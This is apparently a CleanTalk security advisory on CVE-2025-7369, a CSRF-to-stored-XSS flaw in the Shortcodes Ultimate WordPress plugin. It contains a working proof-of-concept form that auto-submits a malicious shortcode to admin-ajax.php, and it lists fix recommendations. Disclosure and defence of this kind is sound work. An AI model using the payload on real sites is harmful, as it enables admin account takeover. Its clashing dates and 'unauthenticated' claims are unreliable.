The Shortcodes Ultimate plugin is a widely used WordPress toolkit, enabling site owners to add rich content elements—buttons, tabs, sliders—via simple shortcodes. With over 500,000 active installations, it is a go-to plugin for visual enhancements. However, a critical vulnerability, CVE-2025-7369, allows unauthenticated attackers to exploit a lack of CSRF protection on the plugin’s AJAX preview endpoint. By submitting a specially crafted form, an attacker can store malicious JavaScript in the database that executes in the administrator’s browser, opening the door to a full account-takeover backdoor.
CVE | CVE-2025-7369 |
Plugin Version | Shortcodes Ultimate <= 7.4.2 |
Critical | High |
All Time | 23 497 655 |
Active installations | 500 000+ |
Publicly Published | May 30, 2025 |
Last Updated | May 30, 2025 |
Researcher | Dmitrii Ignatyev |
OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
PoC | Yes |
Exploit | No |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-7369 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortcodes-ultimate/shortcodes-ultimate-742-cross-site-request-forgery-to-arbitrary-shortcode-execution |
Plugin Security Certification by CleanTalk | ![]() |
Logo of the plugin | ![]() |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
July 8, 2025 | Plugin testing and vulnerability detection in the WP Shortcodes Plugin — Shortcodes Ultimate have been completed |
July 8, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
July 20, 2025 | Registered CVE-2025-7369 |
Discovery of the Vulnerability
During a security review of AJAX actions in Shortcodes Ultimate, researchers found that the su_generator_preview
action can be invoked without any nonce or capability checks. This endpoint stores generated shortcode previews in transient storage but fails to sanitize the submitted shortcode
parameter. Combined with missing CSRF protections, this allows unauthenticated attackers to perform a Cross-Site Request Forgery (CSRF) that persists XSS payloads, later rendered in the WordPress admin when previewing shortcodes.
Understanding of XSS attack’s
Cross-Site Scripting (XSS) remains one of the highest-impact vulnerabilities in web applications. Stored XSS is particularly dangerous because the malicious payload is saved on the server and executed in every user session that views the vulnerable content. In WordPress, similar flaws in plugins like Contact Form 7 and Ninja Forms have been exploited to steal admin cookies, create rogue administrator accounts, or inject stealthy backdoors. CVE-2025-7369 leverages a trusted AJAX endpoint to persist unfiltered shortcode input, demonstrating how missing CSRF and sanitization can lead to serious site compromise.
Exploiting the XSS Vulnerability
To exploit CVE-2025-7369, an attacker without any Cookie:
POC:
<html> <body> <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="su_generator_preview" /> <input type="hidden" name="shortcode" value="[su_button url="#" onclick="alert(document.domain)"]X[/su_button]" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>
____
The impact of CVE-2025-7369 is severe: any unauthenticated attacker can deliver a CSRF attack that results in stored XSS, targeting site administrators. In real-world scenarios, an attacker could send a phishing link to an admin, trigger the payload, and execute a script to add a backdoor administrator, inject malicious plugin code, or extract sensitive data. E-commerce, membership, and high-traffic sites using Shortcodes Ultimate are especially at risk, as a single successful exploit can lead to total site takeover, data breaches, or defacement.
Recommendations for Improved Security
Enforce Nonces & Capability Checks: Protect AJAX endpoints like su_generator_preview
with check_admin_referer()
and current_user_can()
.
Sanitize Shortcode Input: Apply wp_kses_post()
or esc_html()
to the shortcode
parameter before storage or rendering.
Implement CSRF Protection: Reject requests from unauthenticated users or missing valid nonces.
Audit and Update Plugins: Ensure Shortcodes Ultimate and other plugins are updated to the latest secure versions.
Use a WAF & CSP: Deploy a Web Application Firewall to block CSRF/XSS patterns and a Content Security Policy to prevent inline script execution.
To prevent this type of attacks vendor used our methods of prevention.
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2025-7369 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.